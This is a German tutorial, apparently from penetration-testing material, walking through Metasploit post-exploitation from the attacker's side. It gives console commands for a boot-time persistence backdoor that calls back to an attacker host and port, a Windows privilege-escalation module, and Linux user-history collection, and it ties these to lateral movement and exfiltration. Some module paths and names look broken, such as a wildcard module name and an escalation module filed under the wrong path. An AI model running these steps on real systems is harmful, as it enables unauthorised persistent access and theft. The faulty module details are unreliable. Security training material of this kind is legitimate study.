Aufrechterhaltung des persistenten Zugriffs
Um den persistenten Zugriff auf das kompromittierte System aufrechtzuerhalten, bietet Metasploit verschiedene Module, die verwendet werden können, um eine zuverlässige und dauerhafte Verbindung herzustellen. Eines der am häufigsten verwendeten Module ist das Modul post/windows/manage/persistence_*
, mit dem der Angreifer eine Hintertür erstellen kann, die beim Systemstart automatisch ausgeführt wird.
sequenceDiagram
participant Angreifer
participant Zielsystem
Angreifer->>Zielsystem: Initialer Exploit
Zielsystem->>Angreifer: Kompromittiertes System
Angreifer->>Zielsystem: Ausführung des Persistenz-Moduls
Zielsystem->>Angreifer: Permanenter Zugriff hergestellt
Beispiel für ein Persistenz-Modul
- Starten Sie die Metasploit-Konsole auf dem System des Angreifers (Ubuntu 22.04):
msfconsole
- Verwenden Sie das Persistenz-Modul:
use post/windows/manage/persistence_*
- Legen Sie die erforderlichen Optionen fest, wie z. B. die
LHOST
(IP-Adresse des Angreifers) und LPORT
(Hörender Port):set LHOST 192.168.1.100
set LPORT 4444
- Führen Sie das Modul aus, um persistenten Zugriff auf das Zielsystem herzustellen:
run
Berechtigungshoheitserhöhung
Die Erlangung erhöhter Berechtigungen auf dem kompromittierten System ist entscheidend für weitere Ausnutzungen und Informationsbeschaffung. Metasploit bietet verschiedene Module zur Unterstützung der Berechtigungshoheitserhöhung, wie z. B. post/windows/escalate/*
und post/linux/escalate/*
.
Beispiel für Berechtigungshoheitserhöhung (Windows)
- Verwenden Sie das Modul
post/windows/escalate/ms16_032_secondary_logon_handle_privesc
:use post/windows/escalate/ms16_032_secondary_logon_handle_privesc
- Legen Sie die erforderlichen Optionen fest, wie z. B. die
SESSION
-Nummer:set SESSION 1
- Führen Sie das Modul aus, um die Berechtigungshoheitserhöhung zu versuchen:
run
Die Post-Exploitation-Module von Metasploit können verwendet werden, um wertvolle Informationen über das kompromittierte System zu sammeln, wie z. B. Benutzerkonten, Netzwerkkonfigurationen und laufende Prozesse. Diese Informationen können verwendet werden, um den Zugriff und die Kontrolle des Angreifers auf das Zielsystem weiter auszuweiten.
- Verwenden Sie das Modul
post/linux/gather/enum_users_history
:use post/linux/gather/enum_users_history
- Legen Sie die erforderlichen Optionen fest, wie z. B. die
SESSION
-Nummer:set SESSION 1
- Führen Sie das Modul aus, um Informationen zur Benutzerhistorie zu sammeln:
run
Die durch diese Post-Exploitation-Module gesammelten Informationen können verwendet werden, um die nächsten Schritte des Angriffs zu planen, wie z. B. laterales Bewegung oder Datenexfiltration.